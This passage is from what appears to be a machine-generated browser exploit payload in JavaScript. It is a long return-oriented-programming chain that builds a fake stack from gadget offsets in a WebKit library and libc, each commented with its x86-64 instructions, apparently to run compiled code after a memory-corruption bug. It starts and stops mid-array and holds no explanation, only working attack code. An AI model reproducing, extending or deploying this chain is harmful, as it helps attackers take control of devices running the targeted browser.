//pop rsi ropchain+439856, //L9355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+439808, //L9352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+439824, //L9353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9352: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9353: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9354: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9355: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+439952, //L9357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+439936, //L9356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9356: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9357: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+440032, //L9358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9358: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9360: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+440152, //L9363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+440136, //L9361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9361: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9363: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop 
rsi ropchain+440328, //L9366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+440344, //L9367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+440296, //L9364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+440312, //L9365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9364: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9366: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9367: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+440504, //L9371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+440472, //L9369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+440488, //L9370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9368: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9369: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9370: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9371: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+440608, //L9373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+440592, //L9372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9373: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub 
rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+440688, //L9374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9374: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9376: db([4294967240, 4294967295]); // -0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+440808, //L9379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+440792, //L9377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9377: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9379: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+440952, //L9382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+440920, //L9380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+440936, //L9381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9381: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9382: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+441032, //L9383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9383: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9384: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9385: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+441176, 
//L9386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+441208, //L9388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+441192, //L9387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9386: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9387: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9388: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+441320, //L9390 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L9389: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9390: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+441424, //L9391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9391: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9392: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9393: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+441552, //L9395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+441536, //L9394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9394: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9395: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+441632, //L9396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9396: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9398: db([4294967240, 4294967295]); // -0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+441752, //L9401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+441736, //L9399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9399: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9401: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+441864, //L9402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+441896, //L9404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+441880, //L9403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9402: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9403: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9404: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+442072, //L9406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+442088, //L9407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+442056, //L9405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9405: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9406: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9407: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+442200, //L9409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+442248, //L9412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+442216, //L9410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9409: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9410: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9411: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+442360, //L9413+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+442352, //L9413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9413: db([0, 0]); // 0x0 set_gadgets([ ropchain+442376, //L9413+24 ropchain+442704, //L9408 libc_base+764760, //pop rsi ropchain+442416, //L9414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9416: db([4294967240, 4294967295]); // -0x38 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+442536, //L9419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+442520, //L9417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9417: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9419: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+442680, //L9423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+442648, //L9421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+442664, //L9422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9421: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9422: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9423: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+443264, //L9420 //L9408: libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+442744, //L9424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9424: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9425: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9426: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+442872, //L9428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+442856, //L9427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9427: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9428: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, 
rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+442952, //L9429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9429: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9431: db([4294967240, 4294967295]); // -0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+443072, //L9434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+443056, //L9432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9432: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+443184, //L9435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+443216, //L9437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+443200, //L9436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9435: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9436: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9437: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L9420: libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+443336, //L9438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9438: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); 
//pop rsi //L9440: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+443456, //L9443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+443440, //L9441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9441: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9443: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+443600, //L9446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+443568, //L9444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+443584, //L9445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9444: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9445: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9446: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+443680, //L9447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9447: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9449: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+443800, //L9452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+443784, //L9450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9450: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9452: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+443944, //L9455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+443912, //L9453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+443928, //L9454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9453: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9454: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9455: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+444024, //L9456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9456: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9458: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+444144, //L9461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+444128, //L9459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9459: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9461: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+444288, //L9464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+444256, //L9462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+444272, //L9463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9462: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L9463: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9464: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+444368, //L9465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9465: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9467: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+444488, //L9470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+444472, //L9468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9468: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9470: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+444632, //L9473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+444600, //L9471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+444616, //L9472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9471: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9472: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9473: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L9475: ropchain+444736, //L9474 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp 
ropchain+296568, //__ntoa_long_long //L9474: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+444808, //L9476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9476: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9478: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+444888, //L9480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9480: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+466440, //L9479 //L9297: libc_base+764760, //pop rsi ropchain+444952, //L9482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9482: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9484: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+445072, //L9487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+445056, //L9485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9487: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+445248, //L9490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+445264, //L9491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+445216, //L9488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+445232, //L9489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9488: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9489: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9490: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9491: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+445360, //L9493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+445344, //L9492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9492: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9493: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9494: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9495: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L9496: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+445560, //L9498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9498: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+445616, //L9499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9499: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+445752, //L9503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+445736, //L9502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9501: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9503: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+445888, //L9506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+445920, //L9508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+445872, //L9505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9505: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9506: db([0, 